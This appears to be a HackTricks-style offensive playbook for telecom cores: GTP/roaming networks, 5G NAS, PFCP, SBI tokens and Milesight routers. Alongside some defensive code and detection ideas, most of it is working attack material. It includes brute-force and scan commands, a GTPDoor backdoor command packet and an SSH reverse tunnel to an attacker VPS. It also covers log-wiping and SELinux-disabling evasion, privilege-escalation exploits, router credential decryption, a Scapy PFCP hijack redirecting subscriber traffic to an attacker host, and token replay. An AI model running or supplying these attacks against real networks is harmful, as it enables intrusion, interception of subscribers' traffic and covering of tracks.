Telecom Network Exploitation (GTP / Roaming Environments)

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Note

Mobile-core signalling protocols (GPRS Tunnelling Protocol, GTP) frequently traverse semi-trusted GRX/IPX roaming backbones. Because they run over plain UDP with almost no authentication, any foothold inside a telecom perimeter can usually reach core signalling nodes directly. The notes below collect attack tricks observed in practice against SGSN/GGSN, PGW/SGW and other EPC nodes.

1. Recon & Initial Access

1.1 Default OSS / NE Accounts

A surprisingly large set of vendor network elements ship with hard-coded SSH/Telnet users such as root:admin, dbadmin:dbadmin, cacti:cacti, ftpuser:ftpuser, … A dedicated wordlist dramatically increases brute-force success:

hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt

If the device exposes only a management VRF, pivot through a jump host first (see the «SGSN Emu Tunnel» section below).

1.2 Host discovery inside GRX/IPX

Most GRX operators still allow ICMP echo across the backbone. Combine masscan with the built-in gtpv1 UDP probes to map GTP-C listeners (UDP 2123) quickly:

masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55

2. Enumerating Subscribers – cordscan

The following Go tool crafts GTP-C Create PDP Context Request packets and records the responses. Each response reveals the SGSN/MME currently serving the queried IMSI and, sometimes, the PLMN the subscriber is visiting.

# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan

# Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap

Important flags:

  • --imsi  IMSI of the target subscriber
  • --oper  Home / HNI (MCC+MNC)
  • -w      write raw packets to a pcap

Key constants inside the binary can be edited to widen the scan:

pingtimeout       = 3   // seconds before giving up
pco               = 0x218080
common_tcp_ports  = "22,23,80,443,8080"
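Added example (not cordscan's code): building and parsing the GTPv1-C Create PDP Context Request that cordscan sends, so the TBCD encoding of the IMSI, the S flag and the length field are visible byte by byte. The IMSI is the one from the usage line above; only the IMSI IE is emitted, whereas a real request carries many more IEs (RAI, APN, QoS, PCO, …).

```python
import struct

GTP_FLAGS_V1_S = 0x32        # version=1, PT=1 (GTP, not GTP'), S=1 (sequence number present)
CREATE_PDP_CONTEXT_REQ = 16  # GTPv1-C message type
IE_IMSI = 0x02               # TV IE with a fixed 8-octet TBCD value


def tbcd_encode(digits: str) -> bytes:
    """Pack decimal digits as TBCD: first digit in the low nibble, 0xF filler if odd."""
    if not digits.isdigit():
        raise ValueError("IMSI must consist of decimal digits")
    if len(digits) % 2:
        digits += "f"
    return bytes(int(digits[i], 16) | (int(digits[i + 1], 16) << 4)
                 for i in range(0, len(digits), 2))


def tbcd_decode(raw: bytes) -> str:
    """Inverse of tbcd_encode; stops at the first 0xF filler nibble."""
    digits = []
    for b in raw:
        lo, hi = b & 0x0F, b >> 4
        if lo == 0xF:
            break
        digits.append(str(lo))
        if hi == 0xF:
            break
        digits.append(str(hi))
    return "".join(digits)


def build_create_pdp_req(imsi: str, seq: int, teid: int = 0) -> bytes:
    """GTPv1-C Create PDP Context Request carrying only the IMSI IE."""
    imsi_ie = bytes([IE_IMSI]) + tbcd_encode(imsi).ljust(8, b"\xff")  # pad 14-digit IMSIs
    # With S=1 the four optional octets (seq, N-PDU number, next ext header) belong to the
    # payload and are therefore counted in the length field.
    payload = struct.pack("!HBB", seq, 0, 0) + imsi_ie
    header = struct.pack("!BBHI", GTP_FLAGS_V1_S, CREATE_PDP_CONTEXT_REQ, len(payload), teid)
    return header + payload


def parse_gtpv1(pkt: bytes) -> dict:
    """Decode header, optional fields and the IMSI IE of a GTPv1-C datagram."""
    flags, msg_type, length, teid = struct.unpack("!BBHI", pkt[:8])
    if flags >> 5 != 1:
        raise ValueError("not a GTPv1 packet")
    body = pkt[8:8 + length]
    seq = None
    if flags & 0x07:                      # E, S or PN set -> optional octets present
        seq = struct.unpack("!H", body[:2])[0]
        body = body[4:]
    ies = {}
    if body and body[0] == IE_IMSI:       # other IEs are not decoded in this example
        ies["imsi"] = tbcd_decode(body[1:9])
    return {"type": msg_type, "teid": teid, "seq": seq, "ies": ies}


if __name__ == "__main__":
    pkt = build_create_pdp_req("404995112345678", seq=0x1234)
    print(pkt.hex())
    print(parse_gtpv1(pkt))
```

socket.sendto(pkt, (sgsn_ip, 2123)) puts the datagram on the wire; the parser also decodes what comes back, since the response reuses the same header layout (message type 17, Create PDP Context Response).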

3. Code Execution over GTP – GTPDoor

GTPDoor is a small ELF service that binds UDP 2123 and parses every incoming GTP-C packet. When the payload starts with a pre-shared tag, the remainder is decrypted (AES-128-CBC) and executed via /bin/sh -c. stdout/stderr are exfiltrated inside Echo Response messages, so no outbound session is ever created.

Minimal PoC packet (Python):

import gtpc                      # helper from the tooling described on this page, not a PyPI module
import Crypto.Cipher.AES as AES  # pycryptodome
key = b"SixteenByteKey!!"        # AES-128 requires exactly 16 bytes
cmd = b"id;uname -a"
# zero IV and zero padding to a 32-byte boundary, as the implant's decryptor expects
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32, b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))

Detection:

  • any host sending unbalanced Echo Requests towards SGSN IPs
  • GTP version flag set to 1 while message type = 1 (Echo), a deviation from the spec

4. Pivoting Through the Core

4.1 sgsnemu + SOCKS5

OsmoGGSN ships an SGSN emulator able to establish a PDP context towards a real GGSN/PGW. Once the context is accepted, Linux receives a new tun0 interface that is reachable from the roaming peer.

sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
-APN internet -c 1 -d
ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 &   # internal SOCKS proxy

With proper firewall hair-pinning, this tunnel bypasses signalling-only VLANs and drops you directly into the data plane.

4.2 SSH Reverse Tunnel over Port 53

DNS is almost always open in roaming infrastructures. Expose an internal SSH service on your VPS listening on :53, then come back later from home:

ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com

Make sure GatewayPorts yes is enabled on the VPS, otherwise the -R listener binds to the VPS loopback only.

5. Covert Channels

| Channel | Transport | Decoding | Notes |
|---|---|---|---|
| ICMP – EchoBackdoor | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | purely passive listener, no outbound traffic |
| DNS – NoDepDNS | UDP 53 | XOR (key = funnyAndHappy) encoded in A-record octets | watches the *.nodep sub-domain |
| GTP – GTPDoor | UDP 2123 | AES-128-CBC blob in a private IE | blends in with legitimate GTP-C chatter |

All implants implement watchdogs that timestomp their own binaries and re-spawn them if they crash.

6. Defense Evasion Cheatsheet

# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp

# Disable bash history
export HISTFILE=/dev/null

# Masquerade as kernel thread (cosmetic only: the task stays listed and /proc/$$/cmdline is untouched)
echo 0 > /proc/$$/autogroup          # only resets the CFS autogroup nice value; hides nothing by itself
printf 'kworker/1:0' > /proc/$$/comm  # sets the COMM name shown by top / ps -o comm (max 15 chars)

touch -r /usr/bin/time /usr/bin/chargen   # timestomp
setenforce 0                              # disable SELinux

7. Privilege Escalation on legacy NEs

# DirtyCow – CVE-2016-5195 (firefart's dirty.c adds user "firefart" with the given password to /etc/passwd)
gcc -pthread dirty.c -o dirty -lcrypt && ./dirty NewPassw0rd

# PwnKit – CVE-2021-4034
python3 PwnKit.py

# Sudo Baron Samedit – CVE-2021-3156
python3 exploit_userspec.py

Cleanup hint:

userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c

8. Tooling

  • cordscan, GTPDoor, EchoBackdoor, NoDepDNS – custom tooling described in the previous sections.
  • FScan : intranet TCP sweeps (fscan -p 22,80,443 10.0.0.0/24)
  • Responder : LLMNR/NBT-NS rogue WPAD
  • Microsocks + ProxyChains : lightweight SOCKS5 pivoting
  • FRP (≥0.37) : NAT traversal / asset bridging

9. 5G NAS Registration Attacks: SUCI leaks, bidding-down to EEA0/EIA0, and NAS replay

The 5G registration procedure runs over NAS (Non-Access Stratum) on top of NGAP. Until NAS security is activated by Security Mode Command/Complete, initial messages are unauthenticated and unencrypted. This pre-security window enables multiple attack paths when you can observe or tamper with N2 traffic (e.g., on-path inside the core, rogue gNB, or testbed).

Registration flow (simplified):

  • Registration Request: UE sends SUCI (encrypted SUPI) and capabilities.
  • Authentication: AMF/AUSF send RAND/AUTN; UE returns RES*.
  • Security Mode Command/Complete: NAS integrity and ciphering are negotiated and activated.
  • PDU Session Establishment: IP/QoS setup.

Lab setup tips (non-RF):

  • Core: an Open5GS default deployment is sufficient to reproduce the flows.
  • UE: a simulator or test UE; decode with Wireshark.
  • Active tooling: 5GReplay (capture/modify/replay NAS within NGAP), Sni5Gect (sniff/patch/inject NAS on the fly without bringing up a full rogue gNB).
  • Useful Wireshark display filters (confirm the exact field names in the packet-details pane of your Wireshark build; current builds expose the 5GMM message type as nas-5gs.mm.message_type):
    • ngap.procedure_code == 15 (InitialUEMessage)
    • nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request, 5GMM message type 0x41)

9.1 Identity privacy: SUCI errors exposing SUPI/IMSI

Expected: the UE/USIM must send a SUCI (the SUPI encrypted with the home-network public key). Finding an unencrypted SUPI/IMSI in the Registration Request reveals a privacy flaw that allows long-term subscriber tracking. Note that a SUCI using the null protection scheme (Protection scheme Id 0) also carries the MSIN in clear, so check the scheme field and not only the identity type.

How to test:

  • Capture the first NAS message inside the InitialUEMessage and inspect the Mobile Identity IE.
  • Quick Wireshark check:
    • It should decode as SUCI, not IMSI.
    • Example filter: nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci should match; its absence together with a present imsi field indicates a leak (confirm the field names in your Wireshark build).

What to collect:

  • MCC/MNC/MSIN if exposed; record per UE and track over time and locations.

Mitigation:

  • Enforce SUCI-only policies for UEs/USIMs; raise an alert for every IMSI/SUPI that appears in initial NAS.

9.2 Capability bidding-down to null algorithms (EEA0/EIA0)

Background:

  • The UE advertises its supported ciphering (EEA; in 5G terms 5G-EA/NEA) and integrity (EIA; 5G-IA/NIA) algorithms in the UE Security Capability IE of the Registration Request.
  • Common mappings: EEA1/EIA1 = SNOW 3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 are the null algorithms.

Problem:

  • Because the Registration Request is not integrity-protected, an on-path attacker can clear capability bits to force the selection of EEA0/EIA0 later in the Security Mode Command. Some stacks wrongly accept null algorithms outside emergency services.

Attack steps:

  • Intercept the InitialUEMessage and modify the NAS UE Security Capability so that it advertises only EEA0/EIA0.
  • With Sni5Gect, hook the NAS message and patch the capability bits before forwarding it.
  • Check whether the AMF accepts null ciphering/integrity and completes Security Mode with EEA0/EIA0.

Caveat: the Security Mode Command echoes the UE security capabilities back to the UE under NAS integrity protection, and a UE conforming to TS 24.501 aborts the procedure when that copy differs from what it sent. The downgrade therefore only lands against UEs that skip this check; against a conforming UE the on-path patch produces a Security Mode Reject, which is itself a useful signal.

Verification/evidence:

  • In Wireshark, confirm the selected algorithms after Security Mode Command/Complete.
  • Example passive-sniffer output:
Encyrption in use [EEA0]
Integrity in use [EIA0, EIA1, EIA2]
SUPI (MCC+MNC+MSIN) 9997000000001

Mitigations (mandatory):

  • Configure the AMF/policy to reject EEA0/EIA0 except where strictly required (e.g., emergency calls).
  • Prefer enforcing EEA2/EIA2 as the minimum; log and alert on any NAS security context that negotiates null algorithms.
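Added example, not code from Sni5Gect, 5GReplay or Open5GS: decoding the value part of the UE security capability IE (TS 24.501 9.11.3.54, first two octets: 5G-EA0..7 then 5G-IA0..7, with bit 8 = algorithm 0), the capability patch an on-path attacker applies, and two AMF-side selection routines, one that accepts the null algorithms and one implementing the mitigation policy above. The operator preference lists are assumptions; the sample capability matches the sniffer output above (EA0-2 / IA0-2).

```python
# Operator preference (assumed): AES first, then SNOW 3G, ZUC, and null last.
CIPHER_PREF = [2, 1, 3, 0]
INTEGRITY_PREF = [2, 1, 3, 0]


def decode_caps(value: bytes):
    """Return (supported EA list, supported IA list) from the first two IE value octets."""
    ea = [i for i in range(8) if value[0] & (0x80 >> i)]   # bit 8 = 5G-EA0 ... bit 1 = 5G-EA7
    ia = [i for i in range(8) if value[1] & (0x80 >> i)]   # bit 8 = 5G-IA0 ... bit 1 = 5G-IA7
    return ea, ia


def encode_caps(ea, ia) -> bytes:
    return bytes([sum(0x80 >> i for i in ea), sum(0x80 >> i for i in ia)])


def bid_down(value: bytes) -> bytes:
    """Attacker patch applied to the unprotected Registration Request: keep only EA0/IA0."""
    return encode_caps([0], [0])


def select_lenient(value: bytes):
    """Vulnerable AMF: picks the most preferred mutually supported algorithm, null included."""
    ea, ia = decode_caps(value)
    return (next(a for a in CIPHER_PREF if a in ea),
            next(a for a in INTEGRITY_PREF if a in ia))


def select_strict(value: bytes, emergency: bool = False):
    """Hardened AMF: null algorithms are eligible only for emergency registration.

    Returns (EA, IA) or None when no acceptable pair exists (the AMF should then
    reject the registration and raise an alarm: a UE that truly supports only null
    algorithms is either broken or being tampered with on path)."""
    ea, ia = decode_caps(value)
    ea_choice = next((a for a in CIPHER_PREF if a in ea and (a != 0 or emergency)), None)
    ia_choice = next((a for a in INTEGRITY_PREF if a in ia and (a != 0 or emergency)), None)
    if ea_choice is None or ia_choice is None:
        return None
    return ea_choice, ia_choice


# Constructed UE capability: EA0/EA1/EA2 and IA0/IA1/IA2 supported -> octets e0 e0
UE_CAPS = encode_caps([0, 1, 2], [0, 1, 2])

if __name__ == "__main__":
    patched = bid_down(UE_CAPS)
    print("original  :", UE_CAPS.hex(), select_lenient(UE_CAPS), select_strict(UE_CAPS))
    print("bid-down  :", patched.hex(), select_lenient(patched), select_strict(patched))
```

The lenient selector happily completes Security Mode with (0, 0) once the bits are cleared; the strict selector returns None for the same input and only tolerates the null pair when the registration is flagged as emergency.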

9.3 Replay of the initial Registration Request (pre-security NAS)

Because initial NAS has neither integrity protection nor freshness, a captured InitialUEMessage + Registration Request can be replayed to the AMF.

PoC rule for 5GReplay to forward matching replays:

<beginning>
<property value="THEN"
property_id="101"
type_property="FORWARD"
description="Forward InitialUEMessage with Registration Request">

<!-- Trigger on NGAP InitialUEMessage (procedureCode == 15) -->
<event value="COMPUTE"
event_id="1"
description="Trigger: InitialUEMessage"
boolean_expression="ngap.procedure_code == 15"/>

<!-- Context match on NAS Registration Request (message_type == 65) -->
<event value="COMPUTE"
event_id="2"
description="Context: Registration Request"
boolean_expression="nas_5g.message_type == 65"/>

</property>
</beginning>

What to observe:

  • Whether the AMF accepts the replay and proceeds to Authentication; the absence of timing/context validation indicates exposure.

Mitigations:

  • Enforce replay protection/context binding in the AMF; rate-limit and correlate per gNB/UE.

9.4 Tooling pointers (reproducible)

  • Open5GS: spin up an AMF/SMF/UPF to emulate the core; observe N2 (NGAP) and NAS.
  • Wireshark: verify decodes of NGAP/NAS; apply the filters above to isolate Registration.
  • 5GReplay: capture a registration, then replay specific NGAP + NAS messages as per the rule.
  • Sni5Gect: live sniff/modify/inject NAS control-plane to coerce null algorithms or perturb authentication sequences.

9.5 Defensive checklist

  • Continuously inspect Registration Request for plaintext SUPI/IMSI; block offending devices/USIMs.
  • Reject EEA0/EIA0 except for narrowly defined emergency procedures; require at least EEA2/EIA2.
  • Detect rogue or misconfigured infrastructure: unauthorized gNB/AMF, unexpected N2 peers.
  • Alert on NAS security modes that result in null algorithms or frequent replays of InitialUEMessage.

10. Industrial Cellular Routers – Unauthenticated SMS API Abuse (Milesight UR5X/UR32/UR35/UR41) and Credential Recovery (CVE-2023-43261)

Abusing exposed web APIs of industrial cellular routers enables native, carrier-grade smishing at scale and at very low cost. Milesight UR-series routers expose a JSON-RPC-style endpoint at /cgi. When misconfigured, the API can be queried without authentication to list the SMS inbox/outbox and, in some deployments, to send SMS.

Typical unauthenticated requests (same structure for inbox and outbox; send one body per request):

POST /cgi HTTP/1.1
Host: <router>
Content-Type: application/json

{ "base": "query_outbox", "function": "query_outbox", "values": [ {"page":1,"per_page":50} ] }
{ "base": "query_inbox", "function": "query_inbox", "values": [ {"page":1,"per_page":50} ] }

Responses include fields such as timestamp, content, phone_number (E.164) and status (success or failed). Repeated failed sends to the same number are often attacker "capability checks" to confirm that the router/SIM can deliver before blasting.

curl example to exfiltrate SMS metadata:

curl -sk -X POST http://<router>/cgi \
-H 'Content-Type: application/json' \
-d '{"base":"query_outbox","function":"query_outbox","values":[{"page":1,"per_page":100}]}'

Notes on auth artifacts:

  • Some traffic may include an auth cookie, but a large share of exposed devices answer query_inbox/query_outbox without any authentication when the management interface faces the Internet.
  • In environments that do require auth, previously leaked credentials (see below) restore access.

Credential-recovery path – CVE-2023-43261:

  • Affected families: UR5X, UR32L, UR32, UR35, UR41 (before v35.3.0.7).
  • Issue: web-served logs (e.g. httpd.log) are reachable without authentication under /lang/log/ and contain admin login events whose password is encrypted with a hardcoded AES key/IV shipped in the client-side JavaScript.
  • Practical access and decrypt:
curl -sk http://<router>/lang/log/httpd.log | sed -n '1,200p'
# Look for entries like: {"username":"admin","password":"<base64>"}

Minimal Python to decrypt the leaked passwords (AES-128-CBC, hardcoded key/IV):

import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
KEY=b'1111111111111111'; IV=b'2222222222222222'
enc_b64='...'  # value from httpd.log
print(unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(enc_b64)), AES.block_size).decode())

Monitoring and detection ideas (network):

  • Alert on unauthenticated POST /cgi whose JSON body has base/function set to query_inbox or query_outbox.
  • Track bursts of repeated POST /cgi that produce status":"failed" entries for many unique numbers from a single source IP (capability testing).
  • Inventory Internet-exposed Milesight routers; restrict management to VPN; disable SMS features unless needed; upgrade to ≥ v35.3.0.7; rotate credentials and review the SMS logs for unknown sends.
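Added example implementing the two monitoring ideas above over constructed data rather than real router traffic; it is not Milesight code. The request-record layout (source IP, path, whether an auth cookie was present, raw body) and the "result" envelope of the query_outbox response are assumptions; the entry fields follow the names listed on this page.

```python
import json
from collections import Counter

SMS_QUERY_FUNCS = {"query_inbox", "query_outbox"}


def unauthenticated_sms_queries(requests):
    """requests: (src_ip, path, has_auth_cookie, body) tuples, e.g. from a reverse proxy
    that logs request bodies (assumed layout). Returns (src_ip, function) per hit."""
    hits = []
    for src, path, authed, body in requests:
        if path != "/cgi" or authed:
            continue
        try:
            call = json.loads(body)
        except ValueError:          # non-JSON bodies are not JSON-RPC calls
            continue
        func = call.get("function") or call.get("base")
        if call.get("base") in SMS_QUERY_FUNCS or func in SMS_QUERY_FUNCS:
            hits.append((src, func))
    return hits


def capability_check_signals(outbox_json: str, repeat_threshold=3, distinct_threshold=5):
    """Parse a query_outbox response and flag the attacker patterns described above:
    repeated failed sends to one number, or failed sends sprayed over many numbers."""
    entries = json.loads(outbox_json)["result"]          # envelope key assumed
    failed = Counter(e["phone_number"] for e in entries if e["status"] == "failed")
    return {
        "repeated_failed": sorted(n for n, c in failed.items() if c >= repeat_threshold),
        "distinct_failed": len(failed),
        "spray": len(failed) >= distinct_threshold,
    }


# Constructed sample data (not captured from a real device)
REQUESTS = [
    ("203.0.113.9", "/cgi", False, '{"base":"query_outbox","function":"query_outbox","values":[{"page":1,"per_page":100}]}'),
    ("203.0.113.9", "/cgi", False, '{"base":"query_inbox","function":"query_inbox","values":[{"page":1,"per_page":50}]}'),
    ("10.0.0.5",    "/cgi", True,  '{"base":"query_inbox","function":"query_inbox","values":[{"page":1,"per_page":50}]}'),
    ("203.0.113.9", "/cgi", False, "not json"),
]
OUTBOX = json.dumps({"result": [
    {"timestamp": "2024-01-01 10:00:00", "phone_number": "+15551230001", "content": "test", "status": "failed"},
    {"timestamp": "2024-01-01 10:00:30", "phone_number": "+15551230001", "content": "test", "status": "failed"},
    {"timestamp": "2024-01-01 10:01:00", "phone_number": "+15551230001", "content": "test", "status": "failed"},
    {"timestamp": "2024-01-01 10:02:00", "phone_number": "+15551230001", "content": "Your parcel ...", "status": "success"},
    {"timestamp": "2024-01-01 10:03:00", "phone_number": "+15551230002", "content": "Your parcel ...", "status": "failed"},
]})

if __name__ == "__main__":
    print(unauthenticated_sms_queries(REQUESTS))
    print(capability_check_signals(OUTBOX))
```

The authenticated internal request is ignored and the malformed body is skipped; the outbox sample trips the repeated-failure rule for one number (three failed attempts followed by a successful send, the capability-check shape described above) but not the spray rule.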

Shodan/OSINT pivots (examples seen in the wild):

  • http.html:"rt_title" matches Milesight router panels.
  • Google dorking for exposed logs: "/lang/log/system" ext:log.

Operational impact: legitimate carrier SIMs inside these routers give SMS phishing very high deliverability and credibility, while the inbox/outbox exposure leaks sensitive metadata at scale.


11. PFCP Session Hijack & GTP-U TEID Abuse

11.1 PFCP Session Modification to steal flows

If you can speak PFCP on N4 (e.g., from a mis-filtered GRX/IPX segment), craft a Session Modification Request that inserts a duplicate PDR ID with a smaller Precedence value (evaluated first) and a FAR pointing to your host. Some UPFs (e.g., OAI-cn5g) apply the first matching PDR and never check ID uniqueness, so the malicious PDR hijacks all subsequent packets of that PDU session towards your sink.

Minimal Scapy PoC (assumes PFCP contrib is available and you know SEID/PDR IDs):

Scapy PFCP session hijack PoC:

```python
from scapy.all import *
from scapy.contrib.pfcp import *

n4 = "10.10.20.5"          # UPF N4 address
seid = 0x123456789abc      # SEID of the victim PDU session
pdr_id = 7                 # existing PDR ID in that session
far_id = 77                # new malicious FAR

# PDR / FAR / fid_identifier below follow the sketch on this page; check
# scapy.contrib.pfcp for the exact IE class names of your scapy version.
pkt = (IP(dst=n4) / UDP(sport=8805, dport=8805) /
       PFCP(S=1, seid=seid, msg_type=MODIFICATION_REQUEST) /
       PFCPSessionModificationRequest(IE_list=[
           PDR(id=pdr_id, precedence=1, outer_header_removal=0,
               far_id=fid_identifier(far_id)),
           FAR(id=far_id, apply_action=0b10,                 # FORWARD
               forwarding_parameters=ForwardingParameters(
                   outer_header_creation=OuterHeaderCreation(
                       desc=0x0002,
                       ipv4_address="203.0.113.55",
                       teid=0xdeadbeef))),
       ]))
send(pkt, verbose=False)
```
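Added example, a model rather than any UPF's code: a minimal PDR/FAR table with first-match lookup in precedence order, the Create PDR path that never checks PDR ID uniqueness, and the hardened path that rejects the duplicate. The session contents, rule IDs and addresses are constructed (the attacker sink is the one used in the PoC above).

```python
from dataclasses import dataclass, field


@dataclass
class PDR:
    pdr_id: int
    precedence: int             # lower value = evaluated first (TS 29.244)
    far_id: int
    src_iface: str = "access"   # PDI source interface: "access" = uplink from the UE


@dataclass
class FAR:
    far_id: int
    dest_ip: str                # where matching packets are forwarded


@dataclass
class Session:
    seid: int
    pdrs: list = field(default_factory=list)
    fars: dict = field(default_factory=dict)

    def classify(self, src_iface: str):
        """First-match lookup in precedence order, as the vulnerable UPF does."""
        for pdr in sorted(self.pdrs, key=lambda p: p.precedence):
            if pdr.src_iface == src_iface:
                return self.fars[pdr.far_id].dest_ip
        return None


def modify_vulnerable(sess: Session, pdr: PDR, far: FAR) -> bool:
    """Applies Create PDR/Create FAR from a Session Modification without checking uniqueness."""
    sess.fars[far.far_id] = far
    sess.pdrs.append(pdr)
    return True


def modify_hardened(sess: Session, pdr: PDR, far: FAR) -> bool:
    """Rejects a Create PDR/FAR whose ID already exists in the session (PFCP cause
    'Rule creation/modification failure'); existing rules may only change via Update PDR."""
    if any(p.pdr_id == pdr.pdr_id for p in sess.pdrs) or far.far_id in sess.fars:
        return False
    sess.fars[far.far_id] = far
    sess.pdrs.append(pdr)
    return True


def make_session() -> Session:
    """Constructed victim session: uplink PDR 7 forwards to the N6 next hop."""
    sess = Session(seid=0x123456789ABC)
    sess.fars[1] = FAR(far_id=1, dest_ip="10.200.0.1")      # legitimate N6 gateway (assumed)
    sess.pdrs.append(PDR(pdr_id=7, precedence=100, far_id=1))
    return sess


HIJACK_PDR = PDR(pdr_id=7, precedence=1, far_id=77)          # same ID, wins on precedence
HIJACK_FAR = FAR(far_id=77, dest_ip="203.0.113.55")          # attacker sink

if __name__ == "__main__":
    s = make_session()
    modify_vulnerable(s, HIJACK_PDR, HIJACK_FAR)
    print("vulnerable UPF forwards uplink to", s.classify("access"))
    h = make_session()
    print("hardened UPF accepted:", modify_hardened(h, HIJACK_PDR, HIJACK_FAR),
          "forwards uplink to", h.classify("access"))
```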

11.2 Injecting user-plane traffic by spoofing TEIDs

If uplink GTP-U from the backbone is not ACL'd, you can replay or guess known TEIDs in GTP-U headers and encapsulate arbitrary IP/TCP towards the UE's peer or the Internet. Example craft:

```python
from scapy.all import IP, UDP, TCP, send
from scapy.contrib.gtp import GTP_U_Header

send(IP(dst="10.10.20.8")/UDP(dport=2152, sport=2152)/
     GTP_U_Header(teid=0x7ffed00)/
     IP(src="10.0.0.10", dst="1.1.1.1")/TCP(dport=443, flags="S"))
```

Combine this with passive sniffing on N3/N6 to learn active TEIDs; many PGW/UPF stacks accept any uplink source once the TEID matches.


12. SBA/SBI Fuzzing & Cross-Service Token Attack (free5GC R17)

FivGeeFuzz (academic, 2025) derives grammars automatically from the 3GPP OpenAPI specs to fuzz the HTTP-based SBIs. Against free5GC it uncovered eight bugs, including Cross-Service Token abuse: a compromised NF obtains an access token for Service A and reuses it against Service B because the target NF performed no audience/issuer checks.

Quick replay idea (assuming you stole an NRF-issued token from any NF):

# Swap :authority to the victim NF and reuse the bearer token
curl -sk -H "Authorization: Bearer $TOKEN" \
-H "Host: smf.internal" \
https://smf.internal/nsmf-pdusession/v1/sm-contexts

To fuzz automatically with the FivGeeFuzz grammars:

python3 fivgeefuzz.py --nf nsmf-pdusession \
--target https://smf.internal \
--grammar grammars/nsmf-pdusession.json \
--token "$TOKEN" --threads 8 --max-cases 500

Look for 401/403 bypasses and crashes in the SMF/AMF pods; patched free5GC builds reject tokens whose aud/iss do not match.
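Added example, not FivGeeFuzz or free5GC code: a stdlib-only JWT verifier for NRF-issued access tokens, with the lenient check that accepts a token minted for another service next to the strict check that binds iss, aud and scope to the producer being called. HS256 with a shared secret is an assumption made to keep the example self-contained; the claim names (iss, sub, aud, scope, exp) follow TS 29.510, and the token, NRF and NF identifiers are constructed.

```python
import base64
import hashlib
import hmac
import json
import time

NRF_SECRET = b"nrf-signing-secret-for-example"   # constructed; HS256 shared key (assumption)


def _b64u(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64u_dec(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint_token(claims: dict, key: bytes = NRF_SECRET) -> str:
    """NRF side: sign the access-token claims."""
    head = _b64u(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = _b64u(json.dumps(claims).encode())
    sig = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    return f"{head}.{body}.{_b64u(sig)}"


def _signed_claims(token: str, key: bytes) -> dict:
    head, body, sig = token.split(".")
    expected = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64u_dec(sig)):
        raise ValueError("bad signature")
    return json.loads(_b64u_dec(body))


def verify_lenient(token: str, key: bytes = NRF_SECRET, now=None) -> dict:
    """Vulnerable producer NF: signature and expiry only, so a token minted for any
    other service or NF is accepted (the Cross-Service Token bug)."""
    claims = _signed_claims(token, key)
    if claims["exp"] < (time.time() if now is None else now):
        raise ValueError("expired")
    return claims


def verify_strict(token: str, my_nf_type: str, my_instance_id: str, nrf_id: str,
                  service: str, key: bytes = NRF_SECRET, now=None) -> dict:
    """Hardened producer NF: additionally binds iss to our NRF, aud to our NF type or
    instance ID, and scope to the service actually being invoked."""
    claims = verify_lenient(token, key, now)
    if claims.get("iss") != nrf_id:
        raise ValueError("token not issued by our NRF")
    aud = claims.get("aud", [])
    aud = aud if isinstance(aud, list) else [aud]
    if my_nf_type not in aud and my_instance_id not in aud:
        raise ValueError(f"audience {aud} does not cover this NF")
    if service not in claims.get("scope", "").split():
        raise ValueError(f"scope does not grant {service}")
    return claims


def accepts(verifier, *args, **kwargs) -> bool:
    """True if the verifier returns claims, False if it rejects the token."""
    try:
        verifier(*args, **kwargs)
        return True
    except ValueError:
        return False


# Constructed token: issued by the NRF to an AMF for the SMF's nsmf-pdusession service.
STOLEN_TOKEN = mint_token({
    "iss": "nrf-01", "sub": "amf-01", "aud": "SMF",
    "scope": "nsmf-pdusession", "exp": 4102444800,   # 2100-01-01
})

if __name__ == "__main__":
    print("SMF, lenient :", accepts(verify_lenient, STOLEN_TOKEN))
    print("UDM, lenient :", accepts(verify_lenient, STOLEN_TOKEN))
    print("UDM, strict  :", accepts(verify_strict, STOLEN_TOKEN, "UDM", "udm-01", "nrf-01", "nudm-sdm"))
```

Replaying the SMF token against a UDM is exactly the curl above with a different :authority; the lenient verifier cannot tell the difference, the strict one fails on aud before it even looks at scope.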


Detection Ideas

  1. Any device other than an SGSN/GGSN initiating Create PDP Context Requests.
  2. Non-standard ports (53, 80, 443) receiving SSH handshakes from internal IPs.
  3. Frequent Echo Requests without matching Echo Responses, a possible sign of GTPDoor beacons.
  4. High volumes of ICMP echo-reply traffic with large, non-zero identifier/sequence values.
  5. 5G: InitialUEMessage carrying identical NAS Registration Requests repeated from the same endpoints (replay signal).
  6. 5G: NAS Security Mode negotiating EEA0/EIA0 outside an emergency context.
  7. PFCP: Session Modification carrying duplicate PDR IDs or sudden FAR changes pointing to off-network IPs.
  8. SBA: NRF-issued tokens whose aud does not match the NF being called, an indicator of Cross-Service Token replay.
